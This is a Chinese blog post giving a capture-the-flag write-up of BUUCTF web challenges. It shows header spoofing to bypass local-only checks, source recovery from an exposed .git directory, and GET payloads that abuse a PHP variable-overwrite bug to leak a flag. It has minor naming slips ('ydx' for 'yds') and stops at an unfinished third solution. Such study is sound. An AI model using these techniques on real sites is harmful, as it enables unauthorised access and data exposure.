<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="文明其思想，野蛮其体魄。">
    <meta name="author" content="二十八华生">
    
    <title>
        
            DASBOOK-Web |
        
        二十八华生的博客
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/bitbug_favicon.6goqr5bioz9c.webp">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"c2yb8er.cn","root":"/","language":"zh-CN","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true},"style":{"primary_color":"#0066cc","logo":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp","favicon":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/bitbug_favicon.6goqr5bioz9c.webp","avatar":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp","font_size":"15.2px","hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/bg.svg","description":"文明其思想，||野蛮其体魄。","font_color":null,"hitokoto":false},"scroll":{"progress_bar":true,"percent":false}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.7"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":false,"auto":true,"custom_label_list":[]},"word_count":{"enable":true,"wordcount":true,"min2read":true},"img_align":"left","copyright_info":true},"version":"3.5.2"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"};
  </script>
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp">
                </a>
            
            <a class="logo-title" href="/">
               二十八华生的博客
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            <div class="article-title">
                <span class="title-hover-animation">DASBOOK-Web</span>
            </div>

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">二十八华生</span>
                            
                        </div>
                        <div class="meta-info">
                            
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2023-05-26 11:04:42</span>
        <span class="mobile">2023-05-26 11:04</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-06-14 08:58:42</span>
    </span>
    
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/Web/">Web</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/BUU%E5%88%B7%E9%A2%98/">BUU刷题</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>2.8k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>12 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                <blockquote>
<p>没有什么重头再来，凡走过的路都算数！(ง •_•)ง</p>
</blockquote>
<span id="more"></span>





<h2 id="0x0-极客大挑战-2019-Http"><a href="#0x0-极客大挑战-2019-Http" class="headerlink" title="0x0:[极客大挑战 2019]Http"></a>0x0:[极客大挑战 2019]Http</h2><p>​    查看网页源代码发现可疑连接：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.1rx0se1qmi9s.png"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># It doesn&#x27;t come from &#x27;https://Sycsecret.buuoj.cn&#x27;</span></span><br><span class="line"></span><br><span class="line">Referer: https://Sycsecret.buuoj.cn</span><br><span class="line"></span><br><span class="line"><span class="comment"># Please use &quot;Syclover&quot; browser</span></span><br><span class="line"></span><br><span class="line">User-Agent: Syclover</span><br><span class="line">    </span><br><span class="line"><span class="comment"># No!!! you can only read this locally!!!</span></span><br><span class="line"></span><br><span class="line">X-Forwarded-For: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br></pre></td></tr></table></figure>



<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.71cfwppd5f40.png"></p>
<h2 id="0x1-BUU-BURP-COURSE-1"><a href="#0x1-BUU-BURP-COURSE-1" class="headerlink" title="0x1.BUU BURP COURSE 1"></a>0x1.BUU BURP COURSE 1</h2><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.33d2rrwg9aw0.png"></p>
<p>​    添加<code>X-Forwarded-For: 127.0.0.1</code> 请求头后无回显</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.6ikafb7k7600.png"></p>
<p>​    </p>
<p>更换为<code>X-Real-IP: 127.0.0.1</code>请求头：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.2bzqx0jnawsg.png"></p>
<p>查看源代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;zh-cn&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>登录<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">style</span>=<span class="string">&quot;text-align: center&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span>&gt;</span></span><br><span class="line">        用户名：<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;username&quot;</span> <span class="attr">value</span>=<span class="string">&quot;admin&quot;</span>/&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">        密码：<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;password&quot;</span> <span class="attr">name</span>=<span class="string">&quot;password&quot;</span> <span class="attr">value</span>=<span class="string">&quot;wwoj2wio2jw93ey43eiuwdjnewkndjlwe&quot;</span>/&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;登录&quot;</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>直接登录会需要重新验证本地登录，使用<code>hackbar</code> Post方法从而实现登录：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.2ro55t0t07y0.png"></p>
<blockquote>
<p>X-Forwarded-For是用于记录代理信息的，每经过一级代理(匿名代理除外)，代理服务器都会把这次请求的来源IP追加在X-Forwarded-For中</p>
<p>X-Real-IP，一般只记录真实发出请求的客户端IP</p>
</blockquote>
<p><a class="link" target="_blank" rel="noopener" href="https://blog.csdn.net/weiyuefei/article/details/78687545">X-Forwarded-For 和 X-Real-IP 的区别<i class="fas fa-external-link-alt"></i></a></p>
<h2 id="0x2-BJDCTF2020-Mark-loves-cat"><a href="#0x2-BJDCTF2020-Mark-loves-cat" class="headerlink" title="0x2: [BJDCTF2020]Mark loves cat"></a>0x2: [BJDCTF2020]Mark loves cat</h2><h3 id="初探题目"><a href="#初探题目" class="headerlink" title="初探题目"></a>初探题目</h3><p>​    打开环境发现是一个还不错的博客网站，但是在末尾出现了一个与主题非常不符合的字符串<code>dog</code></p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.10lnttfn8er4.png"></p>
<p>​    日常用<code>dirsearch</code>扫一下</p>
<hr>
<p>​    这里后面补上，因为数据库项目所用的相应的库版本与dirsearch所需的库版本冲突，故先不使用dirsearch。</p>
<hr>
<h3 id="源码分析"><a href="#源码分析" class="headerlink" title="源码分析"></a>源码分析</h3><p>​    dirsearch扫描后发现<code>/.git</code> 故存在git泄露漏洞。</p>
<p>​    使用<code>Githack</code>利用漏洞下载源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># from flag.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$flag</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;/flag&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>​    这里放一点自己的小新路历程，因为我们发现了那串与网站很不符合的<code>dog</code>字符串在最末尾，所以我们直接翻到<code>index.php</code>的最后，果然发现了漏洞代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># from index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$yds</span> = <span class="string">&quot;dog&quot;</span>;</span><br><span class="line"><span class="variable">$is</span> = <span class="string">&quot;cat&quot;</span>;</span><br><span class="line"><span class="variable">$handsome</span> = <span class="string">&#x27;yds&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="variable">$$x</span> = <span class="variable">$y</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="variable">$$x</span> = <span class="variable">$$y</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="variable">$x</span> &amp;&amp; <span class="variable">$x</span> !== <span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">exit</span>(<span class="variable">$handsome</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]) &amp;&amp; !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="variable">$yds</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span>  || <span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="variable">$is</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;the flag is: &quot;</span>.<span class="variable">$flag</span>;</span><br></pre></td></tr></table></figure>

<p>补充语法知识：</p>
<ol>
<li>php程序可以省略结束符号<code>?&gt;</code></li>
<li><a class="link" target="_blank" rel="noopener" href="https://www.runoob.com/php/php-get.html">$_GET[‘flag’]<i class="fas fa-external-link-alt"></i></a></li>
<li><a class="link" target="_blank" rel="noopener" href="https://www.runoob.com/php/php-post.html">$_POST[‘flag’]<i class="fas fa-external-link-alt"></i></a></li>
<li><a class="link" target="_blank" rel="noopener" href="https://www.runoob.com/php/func-misc-exit.html">php中的exit函数<i class="fas fa-external-link-alt"></i></a>：exit(<em>message</em>)  输出一条消息，并退出当前脚本。</li>
</ol>
<p>​    先分析最简单的，这就是为什么开头我们会发现<code>dog</code>字符串：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 如果既没有通过flag参数进行get和post传参就会直接exit并输出dog字符串</span></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]) &amp;&amp; !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="variable">$yds</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    再分析<code>exit($is);</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 如果通过flag参数进行get或post传参传入的值是flag字符串的话就会直接exit并输出cat字符串</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span>  || <span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="variable">$is</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.3omc7n0fpa60.png"></p>
<p>​    </p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.31l69b2libc0.png"></p>
<p>​    最后分析这个我认为最复杂的部分：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">	<span class="comment">//遍历$_GET数组中的键值对，检查如果GET参数flag的值等于某个键名，并且该键名不等于&quot;flag&quot;本身</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="variable">$x</span> &amp;&amp; <span class="variable">$x</span> !== <span class="string">&#x27;flag&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">exit</span>(<span class="variable">$handsome</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    接下来我将举一个例子来更好地分析体会这串代码：</p>
<p>​    先进行get传参：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?flag=cs&amp;cs=1</span><br></pre></td></tr></table></figure>

<p>​    当使用GET方法传递参数<code>?flag=cs&amp;cs=1</code>时，<code>$_GET</code>数组中的键值对如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_GET</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;flag&#x27;</span> =&gt; <span class="string">&#x27;cs&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;cs&#x27;</span> =&gt; <span class="string">&#x27;1&#x27;</span></span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>​    此时遍历<code>$_GET数组</code>中的键值对<code>$_GET[&#39;flag&#39;]</code>的值为字符串<code>cs</code>，发现数组第二个元素可以满足<code>$_GET[&#39;flag&#39;] === $x</code>这个条件，即使此时的<code>$x</code>等于<code>cs</code>字符串，且<code>cs</code>字符串不等于<code>flag</code>字符串，故执行<code>exit($handsome)</code>，输出<code>ydx</code>并停止。</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.108gu5xmryq8.png"></p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>​    分析完相应漏洞代码后，我们该如何利用来输出flag呢？—–&gt;变量覆盖漏洞</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//遍历$_POST数组中的每个键值对，并将键名赋给变量$x，将对应的值赋给变量$y</span></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_POST</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="variable">$$x</span> = <span class="variable">$y</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//遍历$_GET数组中的每个键值对，并将键名赋给变量$x，将对应的值赋给变量$y</span></span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="variable">$$x</span> = <span class="variable">$$y</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="语法补充：-x与-x的关系："><a href="#语法补充：-x与-x的关系：" class="headerlink" title="语法补充：$x与$$x的关系："></a>语法补充：<code>$x</code>与<code>$$x</code>的关系：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// $x 是一个变量，它保存着一个字符串值，该字符串是一个有效的变量名。</span></span><br><span class="line"><span class="comment">// $$x 则是使用 $x 的值作为变量名，即将变量名间接地确定为 $x 的值。</span></span><br><span class="line"><span class="variable">$x</span> = <span class="string">&#x27;cs&#x27;</span>;</span><br><span class="line"><span class="variable">$cs</span> = <span class="string">&#x27;28&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$$x</span>;  <span class="comment">// --&gt;echo $cs ; --&gt; 输出：28</span></span><br></pre></td></tr></table></figure>



<h3 id="解法一：利用exit-handsome"><a href="#解法一：利用exit-handsome" class="headerlink" title="解法一：利用exit($handsome)"></a>解法一：利用exit($handsome)</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?handsome=flag&amp;flag=handsome</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_GET</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;handsome&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;flag&#x27;</span> =&gt; <span class="string">&#x27;handsome&#x27;</span></span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>​    经过如下代码后有：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$x</span> =&gt; <span class="variable">$y</span>)&#123;</span><br><span class="line">    <span class="variable">$$x</span> = <span class="variable">$$y</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_GET</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;handsome&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;flag&#x27;</span> =&gt; <span class="string">&#x27;handsome&#x27;</span></span><br><span class="line">);</span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">第一次迭代：</span></span><br><span class="line"><span class="comment">$x = handsome , $y = flag</span></span><br><span class="line"><span class="comment">$$x= $handsome , $$y = $flag</span></span><br><span class="line"><span class="comment">$handsome = $flag</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">第二次迭代：</span></span><br><span class="line"><span class="comment">$x = flag , $y = handsome</span></span><br><span class="line"><span class="comment">$x = $flag , $y = $handsome</span></span><br><span class="line"><span class="comment">$flag = $handsome</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<p>​    在此之后，<code>$flag</code>与<code>$handsome</code>变量中的值均是<code>flag.php</code>文件中导入的值。此时刚好满足条件触发<code>exit($handsome)</code>输出<code>flag</code>的值。</p>
<h3 id="解法二：利用exit-yds"><a href="#解法二：利用exit-yds" class="headerlink" title="解法二：利用exit($yds)"></a>解法二：利用exit($yds)</h3><p>​    最简单的解法，原理与解法一相同。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?yds=flag</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_GET</span> = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">&#x27;ydx&#x27;</span> =&gt; <span class="string">&#x27;flag&#x27;</span>,</span><br><span class="line">);</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">第一次迭代：</span></span><br><span class="line"><span class="comment">$x = ydx , $y = flag</span></span><br><span class="line"><span class="comment">$$x= $ydx , $$y = $flag</span></span><br><span class="line"><span class="comment">$ydx = $flag</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230526/St2iv8rimage.35tp06u455s0.png"></p>
<h3 id="解法三：利用exit-is"><a href="#解法三：利用exit-is" class="headerlink" title="解法三：利用exit($is)"></a>解法三：利用exit($is)</h3><blockquote>
<p>​    最开始没细看以为Post方法会有不同的方式利用，没想到Post方法只能实现修改一个变量的内容的功能，所以这里还是使用Get方法获取flag.</p>
</blockquote>
